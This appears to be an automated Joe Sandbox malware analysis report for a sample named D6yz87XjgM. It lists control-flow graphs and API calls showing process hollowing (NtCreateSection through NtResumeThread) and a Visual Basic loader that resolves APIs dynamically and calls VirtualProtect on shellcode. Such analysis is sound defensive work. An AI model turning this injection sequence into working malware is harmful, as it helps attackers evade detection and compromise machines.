                                                                    • Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                    • Instruction Fuzzy Hash: A9E1F4B6D1425AEFDF11DFE4CC80AAEBBB9FF08304F14456AE914A6204D7309A85CF65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 650 2272b02-2272b11 651 2272b17-2272b4c call 22730d7 650->651 652 2272b12 call 2272fd4 650->652 655 2272b52-2272b68 call 22730d7 651->655 656 2272fcb-2272fd1 651->656 652->651 655->656 659 2272b6e-2272c5b call 2273028 * 12 655->659 659->656 684 2272c61-2272c64 659->684 684->656 685 2272c6a-2272c6d 684->685 685->656 686 2272c73-2272c76 685->686 686->656 687 2272c7c-2272c7f 686->687 687->656 688 2272c85-2272c88 687->688 688->656 689 2272c8e-2272c91 688->689 689->656 690 2272c97-2272c9a 689->690 690->656 691 2272ca0-2272ca3 690->691 691->656 692 2272ca9-2272cac 691->692 692->656 693 2272cb2-2272cb4 692->693 693->656 694 2272cba-2272cc8 693->694 695 2272ccd-2272cfe NtCreateSection 694->695 696 2272cca 694->696 695->656 697 2272d04-2272d26 NtMapViewOfSection 695->697 696->695 697->656 698 2272d2c-2272d62 call 22730b8 697->698 701 2272d64-2272d6a 698->701 702 2272d9a-2272dc4 call 2273115 call 22730b8 698->702 703 2272d6f-2272d73 701->703 713 2272e8f-2272e9b GetPEB 702->713 714 2272dca-2272e41 702->714 705 2272d75-2272d88 call 22730b8 703->705 706 2272d8b-2272d98 703->706 705->706 706->702 709 2272d6c 706->709 709->703 715 2272e9e-2272ea5 713->715 717 2272e43-2272e53 714->717 718 2272eb2-2272ecf CreateProcessW 715->718 717->717 719 2272e55-2272e58 717->719 718->656 720 2272ed5-2272ef0 NtGetContextThread 718->720 721 2272e66-2272e6a 719->721 722 2272fb7-2272fba 720->722 723 2272ef6-2272f16 NtReadVirtualMemory 720->723 726 2272e6c 721->726 727 2272e5a-2272e65 721->727 724 2272fc3-2272fc6 722->724 725 2272fbc-2272fc0 NtTerminateProcess 722->725 723->722 728 2272f1c-2272f40 NtWriteVirtualMemory 723->728 724->718 725->724 729 2272e79-2272e7e 726->729 727->721 728->722 730 2272f42-2272f74 NtUnmapViewOfSection NtMapViewOfSection 728->730 733 2272e80-2272e8d 729->733 734 2272e6e-2272e78 729->734 731 2272f76-2272fa5 NtSetContextThread 730->731 732 2272fb4 730->732 731->732 735 2272fa7-2272fb2 NtResumeThread 731->735 732->722 733->715 734->729 735->656 735->732
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02272CF2
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272D1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Section$CreateView
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1585966358-1087957892
                                                                    • Opcode ID: 3eb31ec99a85193f88e70bbcecc521051a1f23482346dadfbb56db0986e45181
                                                                    • Instruction ID: 811d4db7022ee3d586aff35962620cd19205f944d679e01c1a4d4e043ba82f7f
                                                                    • Opcode Fuzzy Hash: 3eb31ec99a85193f88e70bbcecc521051a1f23482346dadfbb56db0986e45181
                                                                    • Instruction Fuzzy Hash: 7DD105B6D1425AEFDF11DFE4CC80AADBBB9FF08304F14456AE914A6204D7309A85CF65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 736 2272af7-2272b37 738 2272ac2 736->738 739 2272b39-2272b4c 736->739 738->736 741 2272b52-2272b68 call 22730d7 739->741 742 2272fcb-2272fd1 739->742 741->742 745 2272b6e-2272c5b call 2273028 * 12 741->745 745->742 770 2272c61-2272c64 745->770 770->742 771 2272c6a-2272c6d 770->771 771->742 772 2272c73-2272c76 771->772 772->742 773 2272c7c-2272c7f 772->773 773->742 774 2272c85-2272c88 773->774 774->742 775 2272c8e-2272c91 774->775 775->742 776 2272c97-2272c9a 775->776 776->742 777 2272ca0-2272ca3 776->777 777->742 778 2272ca9-2272cac 777->778 778->742 779 2272cb2-2272cb4 778->779 779->742 780 2272cba-2272cc8 779->780 781 2272ccd-2272cfe NtCreateSection 780->781 782 2272cca 780->782 781->742 783 2272d04-2272d26 NtMapViewOfSection 781->783 782->781 783->742 784 2272d2c-2272d62 call 22730b8 783->784 787 2272d64-2272d6a 784->787 788 2272d9a-2272dc4 call 2273115 call 22730b8 784->788 789 2272d6f-2272d73 787->789 799 2272e8f-2272e9b GetPEB 788->799 800 2272dca-2272e41 788->800 791 2272d75-2272d88 call 22730b8 789->791 792 2272d8b-2272d98 789->792 791->792 792->788 795 2272d6c 792->795 795->789 801 2272e9e-2272ea5 799->801 803 2272e43-2272e53 800->803 804 2272eb2-2272ecf CreateProcessW 801->804 803->803 805 2272e55-2272e58 803->805 804->742 806 2272ed5-2272ef0 NtGetContextThread 804->806 807 2272e66-2272e6a 805->807 808 2272fb7-2272fba 806->808 809 2272ef6-2272f16 NtReadVirtualMemory 806->809 812 2272e6c 807->812 813 2272e5a-2272e65 807->813 810 2272fc3-2272fc6 808->810 811 2272fbc-2272fc0 NtTerminateProcess 808->811 809->808 814 2272f1c-2272f40 NtWriteVirtualMemory 809->814 810->804 811->810 815 2272e79-2272e7e 812->815 813->807 814->808 816 2272f42-2272f74 NtUnmapViewOfSection NtMapViewOfSection 814->816 819 2272e80-2272e8d 815->819 820 2272e6e-2272e78 815->820 817 2272f76-2272fa5 NtSetContextThread 816->817 818 2272fb4 816->818 817->818 821 2272fa7-2272fb2 NtResumeThread 817->821 818->808 819->801 820->815 821->742 821->818
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02272CF2
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272D1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Section$CreateView
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1585966358-1087957892
                                                                    • Opcode ID: 45bab2479b9087538b20e70b587c0bc8a8ce5d1d9e37fd1158cd0eb1a472643f
                                                                    • Instruction ID: 58ac8b5e578c83a5ebf68048d9f5e5f9780746304992e19c6842d2f4b46db7cd
                                                                    • Opcode Fuzzy Hash: 45bab2479b9087538b20e70b587c0bc8a8ce5d1d9e37fd1158cd0eb1a472643f
                                                                    • Instruction Fuzzy Hash: 49D126B6D1425AEFDF21DFE4CC80AADBBB9FF04304F14456AE914A6244DB309A85CF61

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 863 54a57f-54a5fe call 54a872 call 54ab35 call 54a894 call 54aad6 call 54a894 call 54aad6 call 54a894 call 54aad6 880 54a600-54a61c NtAllocateVirtualMemory 863->880 881 54a623-54a647 NtProtectVirtualMemory 863->881 880->881 882 54a61e 880->882 883 54a64e-54a653 881->883 884 54a649 881->884 885 54a746-54a74b 882->885 886 54a656-54a659 883->886 884->885 887 54a6e7-54a740 NtProtectVirtualMemory 886->887 888 54a65f-54a678 call 54917a 886->888 887->885 891 54a67f-54a68a 888->891 892 54a67a-54a67d 888->892 894 54a6e2 891->894 892->891 893 54a68c-54a68f 892->893 895 54a6a7-54a6aa 893->895 896 54a691-54a6a5 893->896 894->886 897 54a6ac-54a6af 895->897 898 54a6c8-54a6cb 895->898 896->894 897->898 899 54a6b1-54a6c6 897->899 898->894 900 54a6cd-54a6d0 898->900 899->894 900->894 901 54a6d2-54a6d5 900->901 901->894 902 54a6d7-54a6df 901->902 902->894
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess), ref: 0054A616
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess,0054936E), ref: 0054A641
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess,0054936E), ref: 0054A73D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryVirtual$Protect$Allocate
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 955180148-2781105232
                                                                    • Opcode ID: a46659d6b1fd8026fead420b3ff8e7ecdc993c7e1b4199977ab1582f957eb704
                                                                    • Instruction ID: e22a33d9078bf96c33f2217001f6ef94492cd397031fa740021f4d4d55df372c
                                                                    • Opcode Fuzzy Hash: a46659d6b1fd8026fead420b3ff8e7ecdc993c7e1b4199977ab1582f957eb704
                                                                    • Instruction Fuzzy Hash: A751057194020AAFDB50DFA4CC45AEFBFB6FB94318F188315E115A62D2D37059449B63

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 54af1d-54b2fe __vbaChkstk __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 GetModuleHandleW __vbaFreeStrList __vbaChkstk call 54ed1f __vbaStrVarVal __vbaStrToAnsi GetProcAddress __vbaFreeStrList __vbaFreeVar __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaChkstk call 54ed1f __vbaStrVarVal #644 GetModuleHandleW __vbaFreeStrList __vbaFreeVarList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrToAnsi GetProcAddress __vbaFreeStrList __vbaRedim __vbaNew __vbaObjSet __vbaCastObj __vbaObjSet __vbaObjSetAddref __vbaFreeObjList __vbaObjSetAddref #644 __vbaFreeObj #644 call 54ac32 call 54ac41 9 54b30c-54b315 0->9 10 54b317-54b35f __vbaAryLock #644 __vbaAryUnlock call 54ac32 9->10 11 54b361-54b4fb __vbaObjSetAddref #644 __vbaFreeObj #644 call 54ac4f __vbaAryLock #644 __vbaAryUnlock #644 call 54ac32 __vbaRedim #644 call 54ac32 #644 call 54ac32 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 9->11 10->9 23 54b4fd-54b51c __vbaHresultCheckObj 11->23 24 54b51e 11->24 25 54b525-54b581 __vbaAryUnlock __vbaFreeStr #644 call 54ac32 call 54ac41 23->25 24->25 30 54b58f-54b598 25->30 31 54b5e8-54b72f #644 call 54ac32 #644 call 54ac32 #644 call 54ac32 #644 call 54ac32 #644 call 54ac32 VirtualProtect 30->31 32 54b59a-54b5e6 __vbaAryLock #644 __vbaAryUnlock call 54ac32 30->32 46 54b731-54b750 __vbaHresultCheckObj 31->46 47 54b752 31->47 32->30 48 54b759-54b77d call 54ac41 46->48 47->48 51 54b78b-54b794 48->51 52 54b7e4-54b8d6 #644 call 54ac32 #644 call 54ac32 #644 call 54ac32 call 54bb2d __vbaFreeVar __vbaAryDestruct 51->52 53 54b796-54b7e2 __vbaAryLock #644 __vbaAryUnlock call 54ac32 51->53 53->51
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054AE13,?,?,?,?,?,00401006), ref: 0054AF3A
                                                                    • __vbaStrCat.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF56
                                                                    • __vbaStrMove.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF60
                                                                    • __vbaStrCat.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF6B
                                                                    • __vbaStrMove.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF75
                                                                    • __vbaStrCat.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF80
                                                                    • __vbaStrMove.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF8A
                                                                    • #644.MSVBVM60(00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13), ref: 0054AF90
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006), ref: 0054AF96
                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,00401006,00000000,00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000), ref: 0054AFAE
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054AFCD
                                                                      • Part of subcall function 0054ED1F: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                      • Part of subcall function 0054ED1F: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                      • Part of subcall function 0054ED1F: #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                      • Part of subcall function 0054ED1F: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                      • Part of subcall function 0054ED1F: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                      • Part of subcall function 0054ED1F: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                      • Part of subcall function 0054ED1F: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    • __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054AFEF
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054AFF9
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0054B005
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B019
                                                                    • __vbaFreeVar.MSVBVM60 ref: 0054B024
                                                                    • __vbaStrCat.MSVBVM60(0040A208,0040A1FC), ref: 0054B033
                                                                    • __vbaStrMove.MSVBVM60(0040A208,0040A1FC), ref: 0054B03D
                                                                    • __vbaStrCat.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B048
                                                                    • __vbaStrMove.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B052
                                                                    • __vbaStrCat.MSVBVM60(0040A22C,00000000,0040A218,00000000,0040A208,0040A1FC), ref: 0054B05D
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054B06F
                                                                    • __vbaStrVarVal.MSVBVM60(00000000,?,?), ref: 0054B094
                                                                    • #644.MSVBVM60(00000000,00000000,?,?), ref: 0054B09A
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,?), ref: 0054B0A0
                                                                    • __vbaFreeStrList.MSVBVM60(00000003,00000000,0040A218,00000000,00000000,00000000,00000000,?,?), ref: 0054B0B8
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0CD
                                                                    • __vbaStrCat.MSVBVM60(0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0DF
                                                                    • __vbaStrMove.MSVBVM60(0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0E9
                                                                    • __vbaStrCat.MSVBVM60(0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0F4
                                                                    • __vbaStrMove.MSVBVM60(0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0FE
                                                                    • __vbaStrCat.MSVBVM60(0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B109
                                                                    • __vbaStrMove.MSVBVM60(0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B113
                                                                    • __vbaStrCat.MSVBVM60(0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B11E
                                                                    • __vbaStrMove.MSVBVM60(0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B128
                                                                    • __vbaStrCat.MSVBVM60(0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208), ref: 0054B133
                                                                    • __vbaStrMove.MSVBVM60(0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208), ref: 0054B13D
                                                                    • __vbaStrCat.MSVBVM60(0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218), ref: 0054B148
                                                                    • __vbaStrMove.MSVBVM60(0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218), ref: 0054B152
                                                                    • __vbaStrCat.MSVBVM60(0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B15D
                                                                    • __vbaStrMove.MSVBVM60(0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B167
                                                                    • __vbaStrCat.MSVBVM60(0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B172
                                                                    • __vbaStrMove.MSVBVM60(0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B17C
                                                                    • __vbaStrCat.MSVBVM60(0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000), ref: 0054B187
                                                                    • __vbaStrMove.MSVBVM60(0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000), ref: 0054B191
                                                                    • __vbaStrCat.MSVBVM60(0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000), ref: 0054B19C
                                                                    • __vbaStrMove.MSVBVM60(0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000), ref: 0054B1A6
                                                                    • __vbaStrCat.MSVBVM60(0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000), ref: 0054B1B1
                                                                    • __vbaStrMove.MSVBVM60(0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000), ref: 0054B1BB
                                                                    • __vbaStrCat.MSVBVM60(0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000), ref: 0054B1C6
                                                                    • __vbaStrMove.MSVBVM60(0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000), ref: 0054B1D0
                                                                    • __vbaStrCat.MSVBVM60(0040A250,00000000,0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000), ref: 0054B1DB
                                                                    • __vbaStrMove.MSVBVM60(0040A250,00000000,0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000), ref: 0054B1E5
                                                                    • __vbaStrToAnsi.MSVBVM60(00000000,00000000,0040A250,00000000,0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000), ref: 0054B1EF
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0054B1FB
                                                                    • __vbaFreeStrList.MSVBVM60(0000000E,00000000,0040A218,?,?,?,0040A238,0040A240,00000000,0040A248,00000000,0040A250,00000000,0040A258,00000000,00000000), ref: 0054B23F
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000), ref: 0054B25A
                                                                    • __vbaNew.MSVBVM60(0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000), ref: 0054B26C
                                                                    • __vbaObjSet.MSVBVM60(0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268,00000000), ref: 0054B276
                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268), ref: 0054B27C
                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000,00000000,0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270), ref: 0054B286
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,00000000,0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000), ref: 0054B292
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,0040A260,00000000,00000000,00000000,00000000,00000000,0040A260,00000000,0040A2AC,0040A2BC), ref: 0054B2A1
                                                                    • __vbaObjSetAddref.MSVBVM60(0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268), ref: 0054B2B4
                                                                    • #644.MSVBVM60(00000000,0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000), ref: 0054B2BA
                                                                    • __vbaFreeObj.MSVBVM60(00000000,0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000), ref: 0054B2C5
                                                                    • #644.MSVBVM60(0040A1FC,00000000,0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270), ref: 0054B2CE
                                                                    • __vbaAryLock.MSVBVM60(0040A208,?,?,0040A1FC,00000000), ref: 0054B31E
                                                                    • #644.MSVBVM60(0000000C,0040A208,?,?,0040A1FC,00000000), ref: 0054B336
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,?,?,0040A1FC,00000000), ref: 0054B345
                                                                    • __vbaObjSetAddref.MSVBVM60(0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B36C
                                                                    • #644.MSVBVM60(00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B372
                                                                    • __vbaFreeObj.MSVBVM60(00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B37D
                                                                    • #644.MSVBVM60(0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B38B
                                                                    • __vbaAryLock.MSVBVM60(0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3AD
                                                                    • #644.MSVBVM60(0000000C,0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3C4
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3D3
                                                                    • #644.MSVBVM60(0057F2D0,0040A208,0000000C,0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3EB
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,0057F214,00000003,00000001,00000010,00000000,0040A260,0040A1FC,0057F2D0,0040A208,0000000C,0040A208,?,00000000,0040A1FC), ref: 0054B430
                                                                    • #644.MSVBVM60(?,?,0040A1FC,00000000), ref: 0054B43C
                                                                    • #644.MSVBVM60(00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B465
                                                                    • __vbaAryLock.MSVBVM60(0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B499
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B4C1
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B4CB
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B4D1
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC), ref: 0054B4E9
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057F2D0,0040A2BC,0000002C), ref: 0054B511
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208), ref: 0054B529
                                                                    • __vbaFreeStr.MSVBVM60(0040A208), ref: 0054B531
                                                                    • #644.MSVBVM60(?,0040A208), ref: 0054B53A
                                                                    • __vbaAryLock.MSVBVM60(0040A208,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5A4
                                                                    • #644.MSVBVM60(0000000C,0040A208,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5BC
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5CB
                                                                    • #644.MSVBVM60(0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5F9
                                                                    • #644.MSVBVM60(408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B627
                                                                    • #644.MSVBVM60(20C4832C,0057F2D0,0040A1F4,408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B655
                                                                    • #644.MSVBVM60(E02474FF,0057F2D0,0040A1F0,20C4832C,0057F2D0,0040A1F4,408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B683
